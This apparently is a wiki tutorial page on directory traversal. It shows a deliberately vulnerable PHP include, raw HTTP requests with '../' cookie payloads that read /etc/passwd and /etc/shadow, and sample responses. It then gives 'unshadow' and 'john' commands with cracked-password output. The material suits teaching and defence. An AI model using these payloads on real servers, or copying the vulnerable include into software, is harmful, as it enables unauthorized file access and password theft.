Unknown user at 22:29, 3 January 2025

2025-01-03T22:29:29Z

Unknown user: Created page with "Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "travers..."

2025-01-03T22:27:08Z

Created page with "Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "travers..."

New page

Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "traverse to parent directory" passed to file APIs.

The goal of this attack is to use misconfigured applications to gain unauthorized access to the file system. This attack exploits the lack of security (although the software acts exactly as it should) differently from exploiting bugs in code.

Directory traversal is also known as ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also considered canonicalization attacks.

Here is a simple example of a vulnerable application in PHP,

```php
<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
$template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>
```

The application could be named, for example, vulnerable.php.
Placed under the web folder /var/www/html/vulnerable.php

An attack against this system can be done using the following HTTP request, if you are having trouble you can use

```bash
telnet ip-address-server 80
```

enter/type one by one the sentences below,

```
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Cookie: TEMPLATE=../../../../../../../../../etc/shadow
```

Response from ../../etc/passwd approximately:

```
HTTP/1.1 200 OK
Date: Fri, 01 Jun 2018 23:21:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2164
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
..
..
dst
```

The repeated ../ characters after /home/users/phpguru/templates/
cause include() to traverse to the root directory,
then include the Unix password file /etc/passwd.

The /etc/passwd file is typically used for directory traversal examples,
and indeed is often used by crackers trying to break in.

On modern Linux/Unix systems, the /etc/passwd file does not contain passwords.
Passwords are in the shadow file, which is usually only accessible by root.
If the server admin is somewhat careless, and changes permissions, for example,

```bash
sudo su
chmod 644 /etc/shadow
```

then the command ../../etc/shadow will yield, for example,

```
HTTP/1.1 200 OK
Date: Fri, 01 Jun 2018 23:26:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1767
Connection: close
Content-Type: text/html; charset=UTF-8

root:!:17273:0:99999:7:::
daemon:*:16911:0:99999:7:::
bin:*:16911:0:99999:7:::
sys:*:16911:0:99999:7:::
sync:*:16911:0:99999:7:::
games:*:16911:0:99999:7:::
man:*:16911:0:99999:7:::
lp:*:16911:0:99999:7:::
mail:*:16911:0:99999:7:::
news:*:16911:0:99999:7:::
uucp:*:16911:0:99999:7:::
..
..
etc
```

Collect both outputs, for example,
output of /etc/password in passwd.txt
output of /etc/shadow in shadow.txt
with these two files then we can crack using john

```bash
unshadow passwd.txt shadow.txt > mypasswd
john mypasswd
```

The result will be passwords cracked, approximately

```
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123456 (redi)
123456 (krida)
123456 (onno)
123456 (pangtni)
123456 (kasum)
123456 (dansatsiber)
6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green
Use the "--show" option to display all of the cracked passwords reliably
```

==Admin Mistakes==

* Introducing vulnerable PHP
* A critical admin mistake is typing

sudo su
chmod 644 /etc/shadow
```

Kali Linux: Web Directory Traversal Vulnerability (en) - Revision history

Unknown user at 22:29, 3 January 2025

Unknown user: Created page with "Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "travers..."